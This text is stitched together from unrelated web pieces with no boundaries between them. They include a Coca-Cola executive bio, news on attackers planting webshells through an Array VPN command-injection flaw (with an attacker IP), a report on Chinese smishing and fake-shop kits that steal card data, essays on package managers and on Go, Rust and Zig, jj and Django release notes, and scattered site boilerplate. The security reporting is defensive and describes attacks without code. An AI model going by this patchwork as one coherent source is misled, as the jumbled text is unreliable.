Sometimes the daily images are outdated and you need to build Redox from source. For instructions on how to do this, read the Building Redox page.
If you want to contribute, give feedback or just listen in to the conversation, join us on Matrix Chat .
President, The McDonald’s Division
Roberto Mercade is president of The McDonald’s Division (TMD) of The Coca‑Cola Company. He leads a global organization that is responsible for the company’s key relationship with McDonald's in more than 100 markets.
Mercade has been with Coca‑Cola since 1992, when he began his career as a production services manager in Puerto Rico. He went on to hold a number of roles before being named general manager of the Venezuela & Caribbean franchise unit in 2006.
In 2011, he became general manager in South Africa. In 2014, Mercade moved to Australia to lead the South Pacific business unit.
He returned to Latin America in 2018 as president of the Latin Center business unit. In 2021, he became the Mexico zone president.
Mercade holds a degree in industrial engineering from the Georgia Institute of Technology.
Threat actors have been exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users.
Array Networks fixed the vulnerability in a May security update, but has not assigned an identifier, complicating efforts to track the flaw and patch management.
An advisory from Japan's Computer Emergency and Response Team (CERT) warns that hackers have been exploiting the vulnerability since at least August in attacks targeting organizations in the country.
The agency reports that the attacks originate from the IP address 194.233.100[.]138, which is also used for communications.
“In the incidents confirmed by JPCERT/CC, a command was executed attempting to place a PHP webshell file in the path /ca/aproxy/webapp/,” reads the bulletin (machine translated).
The flaw impacts ArrayOS AG 9.4.5.8 and earlier versions, including AG Series hardware and virtual appliances with the ‘DesktopDirect’ remote access feature enabled.
JPCERT says that Array OS version 9.4.5.9 addresses the problem and provides the following workarounds if updating is not possible:
Array Networks AG Series is a line of secure access gateways that rely on SSL VPNs to create encrypted tunnels for secure remote access to corporate networks, applications, desktops, and cloud resources.
Typically, they are used by large organizations and enterprises that need to facilitate remote or mobile work.
Macnica’s security researcher, Yutaka Sejiyama , reported on X that his scans returned 1,831 ArrayAG instances worldwide, primarily in China, Japan, and the United States.
The researcher verified that at least 11 hosts have the DesktopDirect feature enabled, but cautioned that the possibility of more hosts with DesktopDirect active is significant.
“Because this product’s user base is concentrated in Asia and most of the observed attacks are in Japan, security vendors and security organizations outside Japan have not been paying close attention,” Sejiyama told BleepingComputer.
BleepingComputer contacted Array Networks to ask whether they plan to publish a CVE-ID and an official advisory for the actively exploited flaw, but a reply was not available by publication time.
Last year, CISA warned about active exploitation targeting CVE-2023-28461 , a critical remote code execution in Array Networks AG and vxAG ArrayOS.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
China-based phishing groups blamed for non-stop scam SMS messages about a supposed wayward package or unpaid toll fee are promoting a new offering, just in time for the holiday shopping season: Phishing kits for mass-creating fake but convincing e-commerce websites that convert customer payment card data into mobile wallets from Apple and Google. Experts say these same phishing groups also are now using SMS lures that promise unclaimed tax refunds and mobile rewards points.
Over the past week, thousands of domain names were registered for scam websites that purport to offer T-Mobile customers the opportunity to claim a large number of rewards points. The phishing domains are being promoted by scam messages sent via Apple’s iMessage service or the functionally equivalent RCS messaging service built into Google phones.
An instant message spoofing T-Mobile says the recipient is eligible to claim thousands of rewards points.
The website scanning service urlscan.io shows thousands of these phishing domains have been deployed in just the past few days alone. The phishing websites will only load if the recipient visits with a mobile device, and they ask for the visitor’s name, address, phone number and payment card data to claim the points.
A phishing website registered this week that spoofs T-Mobile.
If card data is submitted, the site will then prompt the user to share a one-time code sent via SMS by their financial institution. In reality, the bank is sending the code because the fraudsters have just attempted to enroll the victim’s phished card details in a mobile wallet from Apple or Google. If the victim also provides that one-time code, the phishers can then link the victim’s card to a mobile device that they physically control .
Pivoting off these T-Mobile phishing domains in urlscan.io reveals a similar scam targeting AT&T customers:
An SMS phishing or “smishing” website targeting AT&T users.
Ford Merrill works in security research at SecAlliance , a CSIS Security Group company. Merrill said multiple China-based cybercriminal groups that sell phishing-as-a-service platforms have been using the mobile points lure for some time, but the scam has only recently been pointed at consumers in the United States.
“These points redemption schemes have not been very popular in the U.S., but have been in other geographies like EU and Asia for a while now,” Merrill said.
A review of other domains flagged by urlscan.io as tied to this Chinese SMS phishing syndicate shows they are also spoofing U.S. state tax authorities, telling recipients they have an unclaimed tax refund. Again, the goal is to phish the user’s payment card information and one-time code.
A text message that spoofs the District of Columbia’s Office of Tax and Revenue.
Many SMS phishing or “smishing” domains are quickly flagged by browser makers as malicious. But Merrill said one burgeoning area of growth for these phishing kits — fake e-commerce shops — can be far harder to spot because they do not call attention to themselves by spamming the entire world.
Merrill said the same Chinese phishing kits used to blast out package redelivery message scams are equipped with modules that make it simple to quickly deploy a fleet of fake but convincing e-commerce storefronts. Those phony stores are typically advertised on Google and Facebook , and consumers usually end up at them by searching online for deals on specific products.
A machine-translated screenshot of an ad from a China-based phishing group promoting their fake e-commerce shop templates.
With these fake e-commerce stores, the customer is supplying their payment card and personal information as part of the normal check-out process, which is then punctuated by a request for a one-time code sent by your financial institution. The fake shopping site claims the code is required by the user’s bank to verify the transaction, but it is sent to the user because the scammers immediately attempt to enroll the supplied card data in a mobile wallet.
According to Merrill, it is only during the check-out process that these fake shops will fetch the malicious code that gives them away as fraudulent, which tends to make it difficult to locate these stores simply by mass-scanning the web. Also, most customers who pay for products through these sites don’t realize they’ve been snookered until weeks later when the purchased item fails to arrive.
“The fake e-commerce sites are tough because a lot of them can fly under the radar,” Merrill said. “They can go months without being shut down, they’re hard to discover, and they generally don’t get flagged by safe browsing tools.”
Happily, reporting these SMS phishing lures and websites is one of the fastest ways to get them properly identified and shut down. Raymond Dijkxhoorn is the CEO and a founding member of SURBL , a widely-used blocklist that flags domains and IP addresses known to be used in unsolicited messages, phishing and malware distribution. SURBL has created a website called smishreport.com that asks users to forward a screenshot of any smishing message(s) received.
“If [a domain is] unlisted, we can find and add the new pattern and kill the rest” of the matching domains, Dijkxhoorn said. “Just make a screenshot and upload. The tool does the rest.”
The SMS phishing reporting site smishreport.com.
Merrill said the last few weeks of the calendar year typically see a big uptick in smishing — particularly package redelivery schemes that spoof the U.S. Postal Service or commercial shipping companies.
“Every holiday season there is an explosion in smishing activity,” he said. “Everyone is in a bigger hurry, frantically shopping online, paying less attention than they should, and they’re just in a better mindset to get phished.”
As we can see, adopting a shopping strategy of simply buying from the online merchant with the lowest advertised prices can be a bit like playing Russian Roulette with your wallet. Even people who shop mainly at big-name online stores can get scammed if they’re not wary of too-good-to-be-true offers (think third-party sellers on these platforms).
If you don’t know much about the online merchant that has the item you wish to buy, take a few minutes to investigate its reputation. If you’re buying from an online store that is brand new, the risk that you will get scammed increases significantly. How do you know the lifespan of a site selling that must-have gadget at the lowest price? One easy way to get a quick idea is to run a basic WHOIS search on the site’s domain name. The more recent the site’s “created” date, the more likely it is a phantom store.
If you receive a message warning about a problem with an order or shipment, visit the e-commerce or shipping site directly, and avoid clicking on links or attachments — particularly missives that warn of some dire consequences unless you act quickly. Phishers and malware purveyors typically seize upon some kind of emergency to create a false alarm that often causes recipients to temporarily let their guard down.
But it’s not just outright scammers who can trip up your holiday shopping: Often times, items that are advertised at steeper discounts than other online stores make up for it by charging way more than normal for shipping and handling.
So be careful what you agree to: Check to make sure you know how long the item will take to be shipped, and that you understand the store’s return policies. Also, keep an eye out for hidden surcharges, and be wary of blithely clicking “ok” during the checkout process.
Most importantly, keep a close eye on your monthly statements. If I were a fraudster, I’d most definitely wait until the holidays to cram through a bunch of unauthorized charges on stolen cards, so that the bogus purchases would get buried amid a flurry of other legitimate transactions. That’s why it’s key to closely review your credit card bill and to quickly dispute any charges you didn’t authorize.
Stardust is a unikernel operating system designed to run Cloud applications in a protected, single-address space environment. It delegates the management of physical resources to an underlying hypervisor which is treated as a trusted platform. Stardust has a small code base that can be maintained easily, and relies on static linking to combine a minimal kernel with a single application, along with the libraries and associated programming language run-time required for the execution of the application. Due to static linking, an executable binary of Stardust is packaged within an immutable single-purpose virtual machine image. Stardust supports multiple cores, preemptive threads, and basic block and networking drivers, and provides a collection of standard POSIX-compatible libraries.
Stardust is being used in supporting the teaching and research activities at the University of St Andrews.
Software libraries ported to Stardust for experimentation
C
Showing 9 of 9 repositories
rust Public Forked from rust-lang/rust
Empowering everyone to build reliable and efficient software.
The UK's National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment.
The service is delivered through cybersecurity firm Netcraft and is based on publicly available information and internet scanning.
The NSCS will identify organizations that lack essential security services and will contact them with specific software update recommendations that address unpatched vulnerabilities.
This may include recommendations on specific CVEs or general security issues, such as the use of weak encryption.
“Scanning and notifications will be based on external observations such as the version number publicly advertised by the software,” NCSC explains , adding that this activity is “in compliance with the Computer Misuse Act.”
The agency highlights that the emails sent through this service originate from netcraft.com addresses, do not include attachments, and do not request payments, personal, or other type of information.
BleepingComputer learned that the pilot program will cover UK domains and IP addresses from Autonomous System Numbers (ASNs) in the country.
The service will not cover all systems or vulnerabilities, though, and the recommendation is that entities do not rely on it alone for security alerts.
Organizations are strongly encouraged to sign up for the more mature ‘Early Warning’ service to receive timely notifications for security issues affecting their networks.
Early Warning is a free service from NCSC that alerts on potential cyberattacks, vulnerabilities, or other suspicious activity in a company's network.
It works by aggregating public, private, and government cyber-threat intelligence feeds and cross-referencing them with the domains and IP addresses of enrolled organizations to spot signs of active compromises.
Proactive Notification is triggered before a direct threat or compromise is detected, when NCSC becomes aware of a risk relevant to an organization’s setup.
Together, the two services will form a layered security approach. Proactive Notification helps with hardening systems and reducing risks, while Early Warning will pick up what still manages to slip through.
The NCSC has not provided a timeline for the Proactive Notifications program exiting the pilot phase and becoming more broadly available.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
When people think of package managers they usually picture installing a library but these days package managers and their associated registries handle dozens of distinct functions.
A package manager is a tool that automates the process of installing, updating, configuring, and removing software packages. In practice, modern language package managers have accumulated responsibilities far beyond this definition.
An installer: downloads a package archive from the registry, extracts it and places it in your language’s load path so your code can import it.
An updater: checks for newer versions of installed packages, downloads them, and replaces the old versions, either one at a time or everything at once.
A dependency resolver: when you install a package, you install its dependencies, and their dependencies, and so on, and the resolver figures out which versions can coexist, which is NP-complete and therefore slow, difficult, and full of trade-offs.
A local cache: stores downloaded packages on disk so subsequent installs don’t hit the network, enabling offline installs and faster builds while raising questions about cache invalidation when packages change.
A command runner: executes a package’s CLI tool without permanently installing it by downloading the package, running the command, and cleaning up, which is useful for one-off tasks or trying tools without committing to them.
A script executor: runs scripts defined in your manifest file, whether build, test, lint, deploy, or any custom command, providing a standard way to invoke project tasks without knowing the underlying tools.
A manifest format: a file that declares your project’s dependencies with version constraints, plus metadata like name, version, description, author, license, repository URL, keywords, and entry points, serving as the source of truth for what your project needs.
A lockfile format: records the exact versions of every direct and transitive dependency that were resolved, often with checksums to verify integrity, ensuring everyone working on the project gets identical dependencies.
Dependency types: distinguishes between runtime dependencies, development dependencies, peer dependencies, and optional dependencies, each with different semantics for when they get installed and who’s responsible for providing them.
Overrides and resolutions: lets you force specific versions of transitive dependencies when the default resolution doesn’t work, useful for patching security issues or working around bugs before upstream fixes them.
Workspaces: manages multiple packages in a single repository, sharing dependencies and tooling across a monorepo while still publishing each package independently.
An index: lists all published versions of a package with release dates and metadata, letting you pick a specific version or see what’s available, and is the baseline data most tooling relies on.
A publishing platform: packages your code into an archive, uploads it to the registry, and makes it available for anyone to install, handling versioning, metadata validation, and release management.
A namespace: every package needs a unique name, and most registries use flat namespaces where names are globally unique and first-come-first-served, making short names scarce and valuable, though some support scoped names for organizations or use reverse domain notation to avoid conflicts.
A search engine: the registry website lets you find packages by name, keyword, or category, with results sorted by downloads, recent activity, or relevance, and is often the first place developers go when looking for a library.
A documentation host: renders READMEs on package pages, displays changelogs, and sometimes generates API documentation from source code, with some registries hosting full documentation sites separate from the package listing.
A download counter: tracks how often each package and version gets downloaded, helping developers gauge popularity, identify abandoned projects, and make decisions about which libraries to trust.
A dependency graph API: exposes the full tree of what depends on what, both for individual packages and across the entire registry, which security tools use to trace vulnerability impact and researchers use to study ecosystem structure.
A CDN: distributes package downloads across edge servers worldwide, and since a popular registry handles billions of requests per week, caching, geographic distribution, and redundancy matter because outages affect millions of builds.
A binary host: stores and serves precompiled binaries for packages that include native code, with different binaries for different operating systems, architectures, and language versions, saving users from compiling C extensions themselves.
A build farm: some registries compile packages from source on their own infrastructure, producing binaries that users can trust weren’t tampered with on a developer’s laptop and ensuring consistent build environments.
A mirror: organizations run internal copies of registries for reliability, speed, or compliance, since some companies need packages to come from their own infrastructure, and registries provide protocols and tooling to make this work.
A deprecation policy: rules for marking packages as deprecated, transferring ownership of abandoned packages, or removing code entirely, addressing what happens when a maintainer disappears or a package becomes harmful and balancing immutability against the need to fix mistakes.
An authentication system: publishers need accounts to upload packages, so registries handle signup, login, password reset, two-factor authentication, and API tokens with scopes and expiration, since account security directly affects supply chain security.
An access control system: registries determine who can publish or modify which packages through maintainer lists, organization teams, and role-based permissions, with some supporting granular controls like publish-only tokens or requiring multiple maintainers to sign off on releases.
Trusted publishing: some registries allow CI systems to publish packages using short-lived OIDC tokens instead of long-lived secrets, so you don’t have to store credentials in your build environment and compromised tokens expire quickly.
An audit log: registries record who published what package, when, from what IP address, and using what credentials, useful for forensics after a compromise or just understanding how a package evolved.
Integrity verification: registries provide checksums that detect corrupted or tampered downloads independent of signatures, so even without cryptographic verification you know you got what the registry sent.
A signing system: registries support cryptographic signatures that verify who published a package and that it hasn’t been tampered with. Build provenance attestations can prove a package was built from specific source code in a specific environment.
A security advisory database: registries maintain a catalog of known vulnerabilities mapped to affected package versions, so when a CVE is published they track which packages and version ranges are affected and tools can warn users.
A vulnerability scanner: checks your installed dependencies against the advisory database and flags packages with known security issues, often running automatically during install or as a separate audit command.
A malware scanner: registries analyze uploaded packages for malicious code before or after they’re published, where automated static analysis catches obvious patterns but sophisticated attacks often require human review.
A typosquatting detector: registries scan for package names that look like misspellings of popular packages, which attackers register to catch developers who mistype an install command, and try to detect and block them before they cause harm.
An SBOM generator: produces software bills of materials listing every component in your dependency tree, used for compliance, auditing, and tracking what’s actually running in production.
A security team: registries employ people who triage vulnerability reports, investigate suspicious packages, coordinate takedowns, and respond to incidents, because automation helps but humans make the judgment calls.
So what is a package manager? It depends how far you zoom out. At the surface, it’s a command that installs libraries. One level down, it’s a dependency resolver and a reproducibility tool. Further still, it’s a publishing platform, a search engine, a security operation, and part of global infrastructure.
And how does all of this get funded and supported on an ongoing basis? Sponsorship programs, foundation grants, corporate backing, or just volunteer labor - it varies widely and often determines what’s possible.
jj is a Git-compatible version control system that is both simple and powerful. See
the
installation instructions
to get started.
The documentation has moved from
https://jj-vcs.github.io/jj/
to
https://docs.jj-vcs.dev/
.
301 redirects are being issued towards the new domain, so any existing links
should not be broken.
Fixed race condition that could cause divergent operations when running
concurrent
jj
commands in colocated repositories. It is now safe to
continuously run e.g.
jj log
without
--ignore-working-copy
in one
terminal while you're running other commands in another terminal.
#6830
jj
now ignores
$PAGER
set in the environment and uses
less -FRX
on most
platforms (
:builtin
on Windows). See
the docs
for
more information, and
#3502
for
motivation.
In
filesets or path patterns
, glob matching
is enabled by default. You can use
cwd:"path"
to match literal paths.
In the following commands,
string pattern
arguments
are now parsed the same way they
are in revsets and can be combined with logical operators:
jj bookmark delete
/
forget
/
list
/
move
,
jj tag delete
/
list
,
jj git clone
/
fetch
/
push
In the following commands, unmatched bookmark/tag names is no longer an
error. A warning will be printed instead:
jj bookmark delete
/
forget
/
move
/
track
/
untrack
,
jj tag delete
,
jj git clone
/
push
The default string pattern syntax in revsets will be changed to
glob:
in a
future release. You can opt in to the new default by setting
ui.revsets-use-glob-by-default=true
.
Upgraded
scm-record
from v0.8.0 to v0.9.0. See release notes at
https://github.com/arxanas/scm-record/releases/tag/v0.9.0
.
The minimum supported Rust version (MSRV) is now 1.89.
On macOS, the deprecated config directory
~/Library/Application Support/jj
is not read anymore. Use
$XDG_CONFIG_HOME/jj
instead (defaults to
~/.config/jj
).
Sub-repos are no longer tracked. Any directory containing
.jj
or
.git
is ignored. Note that Git submodules are unaffected by this.
The
--destination
/
-d
arguments for
jj rebase
,
jj split
,
jj revert
,
etc. were renamed to
--onto
/
-o
. The reasoning is that
--onto
,
--insert-before
, and
--insert-after
are all destination arguments, so
calling one of them
--destination
was confusing and unclear. The old names
will be removed at some point in the future, but we realize that they are
deep in muscle memory, so you can expect an unusually long deprecation period.
jj describe --edit
is deprecated in favor of
--editor
.
The config options
git.auto-local-bookmark
and
git.push-new-bookmarks
are
deprecated in favor of
remotes.<name>.auto-track-bookmarks
. For example:
[remotes.origin] auto-track-bookmarks = "glob:*"
For more details, refer to
the docs
.
The flag
--allow-new
on
jj git push
is deprecated. In order to push new
bookmarks, please track them with
jj bookmark track
. Alternatively, consider
setting up an auto-tracking configuration to avoid the chore of tracking
bookmarks manually. For example:
[remotes.origin] auto-track-bookmarks = "glob:*"
For more details, refer to
the docs
.
jj commit
,
jj describe
,
jj squash
, and
jj split
now accept
--editor
, which ensures an editor will be opened with the commit
description even if one was provided via
--message
/
-m
.
All
jj
commands show a warning when the provided
fileset
expression
doesn't match any files.
Added
files()
template function to
DiffStats
. This supports per-file stats
like
lines_added()
and
lines_removed()
Added
join()
template function. This is different from
separate()
in that
it adds a separator between all arguments, even if empty.
RepoPath
template type now has a
absolute() -> String
method that returns
the absolute path as a string.
Added
format_path(path)
template that controls how file paths are printed
with
jj file list
.
New built-in revset aliases
visible()
and
hidden()
.
Unquoted
*
is now allowed in revsets.
bookmarks(glob:foo*)
no longer
needs quoting.
jj prev/next --no-edit
now generates an error if the working-copy has some
children.
A new config option
remotes.<name>.auto-track-bookmarks
can be set to a
string pattern. New bookmarks matching it will be automatically tracked for
the specified remote. See
the docs
.
jj log
now supports a
--count
flag to print the number of commits instead
of displaying them.
jj fix
now prints a warning if a tool failed to run on a file.
#7971
Shell completion now works with non‑normalized paths, fixing the previous
panic and allowing prefixes containing
.
or
..
to be completed correctly.
#6861
Shell completion now always uses forward slashes to complete paths, even on
Windows. This renders completion results viable when using jj in Git Bash.
#7024
Unexpected keyword arguments now return a parse failure for the
coalesce()
and
concat()
templating functions.
Nushell completion script documentation add
-f
option, to keep it up to
date.
#8007
Ensured that with Git submodules, remnants of your submodules do not show up
in the working copy after running
jj new
.
#4349
Thanks to the people who made this release happen!
I realized recently that rather than using “the right tool for the job” I’ve been using the tool at the job and that’s mostly determined the programming languages I know. So over the last couple months I’ve put a lot of time into experimenting with languages I don’t get to use at work. My goal hasn’t been proficiency; I’m more interested in forming an opinion on what each language is good for.
Programming languages differ along so many axes that it can be hard to compare them without defaulting to the obviously true but 1) entirely boring and 2) not-that-helpful conclusion that there are trade-offs. Of course there are trade-offs. The important question is, why did this language commit to this particular set of trade-offs?
That question is interesting to me because I don’t want to choose a language based on a list of features as if I were buying a humidifier. I care about building software and I care about my tools. In making the trade-offs they make, languages express a set of values. I’d like to find out which values resonate with me.
That question is also useful in clarifying the difference between languages that, at the end of the day, have feature sets that significantly overlap. If the number of questions online about “Go vs. Rust” or “Rust vs. Zig” is a reliable metric, people are confused. It’s hard to remember, say, that language X is better for writing web services because it has features a , b , and c whereas language Y only has features a and b . Easier, I think, to remember that language X is better for writing web services because language Y was designed by someone who hates the internet (let’s imagine) and believes we should unplug the whole thing.
I’ve collected here my impressions of the three languages I’ve experimented with lately: Go, Rust, and Zig. I’ve tried to synthesize my experience with each language into a sweeping verdict on what that language values and how well it executes on those values. This might be reductive, but, like, crystallizing a set of reductive prejudices is sort of what I’m trying to do here.
Go is distinguished by its minimalism. It has been described as “a modern C.” Go isn’t like C, because it is garbage-collected and has a real run-time, but it is like C in that you can fit the whole language in your head.
You can fit the whole language in your head because Go has so few features. For a long time, Go was notorious for not having generics. That was finally changed in Go 1.18, but that was only after 12 years of people begging for generics to be added to the language. Other features common in modern languages, like tagged unions or syntactic sugar for error-handling, have not been added to Go.
It seems the Go development team has a high bar for adding features to the language. The end result is a language that forces you to write a lot of boilerplate code to implement logic that could be more succinctly expressed in another language. But the result is also a language that is stable over time and easy to read.
To give you another example of Go’s minimalism, consider Go’s slice type. Both
Rust and Zig have a slice type, but these are fat pointers and fat pointers
only. In Go, a slice is a fat pointer to a contiguous sequence in memory, but a
slice can also grow, meaning that it subsumes the functionality of Rust’s
Vec<T>
type and Zig’s
ArrayList
. Also, since Go is managing your memory for
you, Go will decide whether your slice’s backing memory lives on the stack or
the heap; in Rust or Zig, you have to think much harder about where your memory
lives.
Go’s origin myth, as I understand it, is basically this: Rob Pike was sick of waiting for C++ projects to compile and was sick of other programmers at Google making mistakes in those same C++ projects. Go is therefore simple where C++ is baroque. It is a language for the programming rank and file, designed to be sufficient for 90% of use cases while also being easy to understand, even (perhaps especially) when writing concurrent code.
I don’t use Go at work, but I think I should. Go is minimal in service of corporate collaboration. I don’t mean that as a slight—building software in a corporate environment has its own challenges, which Go solves for.
Where Go is minimalist, Rust is maximalist. A tagline often associated with Rust is “zero-cost abstractions.” I would amend that to read, “zero-cost abstractions, and lots of them!”
Rust has a reputation for being hard to learn. I agree with Jamie Brandon, who writes that it’s not lifetimes that make Rust difficult , it’s the number of concepts stuffed into the language. I’m not the first person to pick on this particular Github comment , but it perfectly illustrates the conceptual density of Rust:
The type
Pin<&LocalType>implementsDeref<Target = LocalType>but it doesn’t implementDerefMut. The typesPinand&are#[fundamental]so that animpl DerefMutforPin<&LocalType>>is possible. You can useLocalType == SomeLocalStructorLocalType == dyn LocalTraitand you can coercePin<Pin<&SomeLocalStruct>>intoPin<Pin<&dyn LocalTrait>>. (Indeed, two layers of Pin!!) This allows creating a pair of “smart pointers that implementCoerceUnsizedbut have strange behavior” on stable (Pin<&SomeLocalStruct>andPin<&dyn LocalTrait>become the smart pointers with “strange behavior” and they already implementCoerceUnsized).
Of course, Rust isn’t trying to be maximalist the same way Go is trying to be minimalist. Rust is a complex language because what it’s trying to do is deliver on two goals—safety and performance—that are somewhat in tension.
The performance goal is self-explanatory. What “safety” means is less clear; at least it was to me, though maybe I’ve just been Python-brained for too long. “Safety” means “memory safety,” the idea that you shouldn’t be able to dereference an invalid pointer, or do a double-free, etc. But it also means more than that. A “safe” program avoids all undefined behavior (sometimes referred to as “UB”).
What is the dreaded UB? I think the best way to understand it is to remember that, for any running program, there are FATES WORSE THAN DEATH. If something goes wrong in your program, immediate termination is great actually! Because the alternative, if the error isn’t caught, is that your program crosses over into a twilight zone of unpredictability, where its behavior might be determined by which thread wins the next data race or by what garbage happens to be at a particular memory address. Now you have heisenbugs and security vulnerabilities. Very bad.
Rust tries to prevent UB without paying any run-time performance penalty by checking for it at compile-time. The Rust compiler is smart, but it’s not omniscient. For it to be able to check your code, it has to understand what your code will do at run-time. And so Rust has an expressive type system and a menagerie of traits that allow you to express, to the compiler, what in another language would just be the apparent run-time behavior of your code.
This makes Rust hard, because you can’t just do the thing! You have to find out Rust’s name for the thing—find the trait or whatever you need—then implement it as Rust expects you to. But if you do this, Rust can make guarantees about the behavior of your code that other languages cannot, which depending on your application might be crucial. It can also make guarantees about other people’s code, which makes consuming libraries easy in Rust and explains why Rust projects have almost as many dependencies as projects in the JavaScript ecosystem.
Of the three languages, Zig is the newest and least mature. As of this writing, Zig is only on version 0.14. Its standard library has almost zero documentation and the best way to learn how to use it is to consult the source code directly.
Although I don’t know if this is true, I like to think of Zig as a reaction to both Go and Rust. Go is simple because it obscures details about how the computer actually works. Rust is safe because it forces you to jump through its many hoops. Zig will set you free! In Zig, you control the universe and nobody can tell you what to do.
In both Go and Rust, allocating an object on the heap is as easy as returning
a pointer to a struct from a function. The allocation is implicit. In Zig, you
allocate every byte yourself, explicitly. (Zig has manual memory management.)
You have more control here than you have even in C: To allocate bytes, you have
to call
alloc()
on a specific kind of allocator, meaning you have to decide
on the best allocator implementation for your use case.
In Rust, creating a mutable global variable is so hard that there are long forum discussions on how to do it. In Zig, you can just create one, no problem.
Undefined behavior is still important in Zig. Zig calls it “illegal behavior.” It tries to detect it at run-time and crash the program when it occurs. For those who might worry about the performance cost of these checks, Zig offers four different “release modes” that you can choose from when you build your program. In some of these, the checks are disabled. The idea seems to be that you can run your program enough times in the checked release modes to have reasonable confidence that there will be no illegal behavior in the unchecked build of your program. That seems like a highly pragmatic design to me.
Another difference between Zig and the other two languages is Zig’s
relationship to object-oriented programming. OOP has been out of favor for a
while now and both Go and Rust eschew class inheritance. But Go and Rust have
enough support for other object-oriented programming idioms that you could
still construct your program as a graph of interacting objects if you wanted
to. Zig has methods, but no private struct fields and no language feature
implementing run-time polymorphism (AKA dynamic dispatch), even though
std.mem.Allocator
is
dying
to be an interface. As best as I can tell, these
exclusions are intentional; Zig is a language for
data-oriented
design
.
One more thing I want to say about this, because I found it eye-opening: It
might seem crazy to be building a programming language with manual memory
management in 2025, especially when Rust has shown that you don’t even need
garbage collection and can let the compiler do it for you. But this is a design
choice very much related to the choice to exclude OOP features. In Go and Rust
and so many other languages, you tend to allocate little bits of memory at a
time for each object in your object graph. Your program has thousands of little
hidden
malloc()
s and
free()
s, and therefore thousands of different
lifetimes.
This is RAII
. In Zig,
it might seem like manual memory management would require lots of tedious,
error-prone bookkeeping, but that’s only if you insist on tying memory
allocations to all your little objects. You could instead just allocate and
free big chunks of memory at certain sensible points in your program (like at
the start of each iteration of your event loop), and use that memory to hold
the data you need to operate on. It’s this approach that Zig encourages.
Many people seem confused about why Zig should exist if Rust does already. It’s not just that Zig is trying to be simpler. I think this difference is the more important one. Zig wants you to excise even more object-oriented thinking from your code.
Zig has a fun, subversive feel to it. It’s a language for smashing the corporate class hierarchy (of objects). It’s a language for megalomaniacs and anarchists. I like it. I hope it gets to a stable release soon, though the Zig team’s current priority seems to be rewriting all of their dependencies . It’s not impossible they try to rewrite the Linux kernel before we see Zig 1.0.
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to Hell Gate.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.
Browse all 512 micro-instructions. Hover the Binary, Move, and Action columns for decoded details and color-coded bit fields.
Source: Andrew Jenner’s 8086 microcode disassembly, based on Ken Shirriff's die photo.
Author: @nand2mario — December 2025
The Intel 8086 executes its machine instructions through microcode. This viewer presents an interactive listing of all 512 micro-instructions in the control ROM. Each micro-instruction is 21 bits wide, addressed by a 13-bit micro-address, and split into two parts: a Move field, which moves data between internal registers, and an Action field, which controls ALU operations, memory cycles, branching, and other control signals.
The microcode address is composed of two fields: the upper 9 bits
AR
and the lower 4 bits
CR
. In the viewer, the opcode/address field is shown as
AR.CR[3:2]
(binary). When the opcode is empty, the next micro-instruction follows sequentially. For short jumps (type 0 actions),
AR
remains unchanged and a 4-bit target is loaded into
CR
; hovering the short-jump value highlights the target row. For long jumps (types 5 and 7), a separate
Translation ROM
maps a 4-bit destination code to a full 13-bit address, and both
AR
and
CR
are replaced with this translated value.
December 3, 2025
Welcome to Django 6.0!
These release notes cover the new features , as well as some backwards incompatible changes you should be aware of when upgrading from Django 5.2 or earlier. We’ve begun the deprecation process for some features .
See the How to upgrade Django to a newer version guide if you’re updating an existing project.
Django 6.0 supports Python 3.12, 3.13, and 3.14. We highly recommend , and only officially support, the latest release of each series.
The Django 5.2.x series is the last to support Python 3.10 and 3.11.
Following the release of Django 6.0, we suggest that third-party app authors
drop support for all versions of Django prior to 5.2. At that time, you should
be able to run your package’s tests using
python
-Wd
so that deprecation
warnings appear. After making the deprecation warning fixes, your app should be
compatible with Django 6.0.
Built-in support for the Content Security Policy (CSP) standard is now available, making it easier to protect web applications against content injection attacks such as cross-site scripting (XSS). CSP allows declaring trusted sources of content by giving browsers strict rules about which scripts, styles, images, or other resources can be loaded.
CSP policies can now be enforced or monitored directly using built-in tools:
headers are added via the
ContentSecurityPolicyMiddleware
, nonces are
supported through the
csp()
context
processor, and policies are configured using the
SECURE_CSP
and
SECURE_CSP_REPORT_ONLY
settings.
These settings accept Python dictionaries and support Django-provided constants for clarity and safety. For example:
from django.utils.csp import CSP SECURE_CSP = { "default-src": [CSP.SELF], "script-src": [CSP.SELF, CSP.NONCE], "img-src": [CSP.SELF, "https:"], }
The resulting
Content-Security-Policy
header would be set to:
default-src 'self'; script-src 'self' 'nonce-SECRET'; img-src 'self' https:
To get started, follow the CSP how-to guide . For in-depth guidance, see the CSP security overview and the reference docs , which include details about decorators to override or disable policies on a per-view basis.
The
Django Template Language
now supports
template partials
, making it easier to encapsulate
and reuse small named fragments within a template file. The new tags
{%
partialdef
%}
and
{%
partial
%}
define a partial and render it, respectively.
Partials can also be referenced using the
template_name#partial_name
syntax
with
get_template()
,
render()
,
{%
include
%}
, and other
template-loading tools, enabling more modular and maintainable templates
without needing to split components into separate files.
A migration guide is available if you’re updating from the django-template-partials third-party package.
Django now includes a built-in Tasks framework for running code outside the HTTP request–response cycle. This enables offloading work, such as sending emails or processing data, to background workers.
The framework provides task definition, validation, queuing, and result handling. Django guarantees consistent behavior for creating and managing tasks, while the responsibility for running them continues to belong to external worker processes.
Tasks are defined using the
task()
decorator:
from django.core.mail import send_mail from django.tasks import task @task def email_users(emails, subject, message): return send_mail(subject, message, None, emails)
Once defined, tasks can be enqueued through a configured backend:
email_users.enqueue( emails=["user@example.com"], subject="You have a message", message="Hello there!", )
Backends are configured via the
TASKS
setting. The
two
built-in backends
included in this release are
primarily intended for development and testing.
Django handles task creation and queuing, but does not provide a worker mechanism to run tasks. Execution must be managed by external infrastructure, such as a separate process or service.
See Django’s Tasks framework for an overview and the Tasks reference for API details.
Email handling in Django now uses Python’s modern email API, introduced in
Python 3.6. This API, centered around the
email.message.EmailMessage
class, offers a cleaner and
Unicode-friendly interface for composing and sending emails. It replaces use of
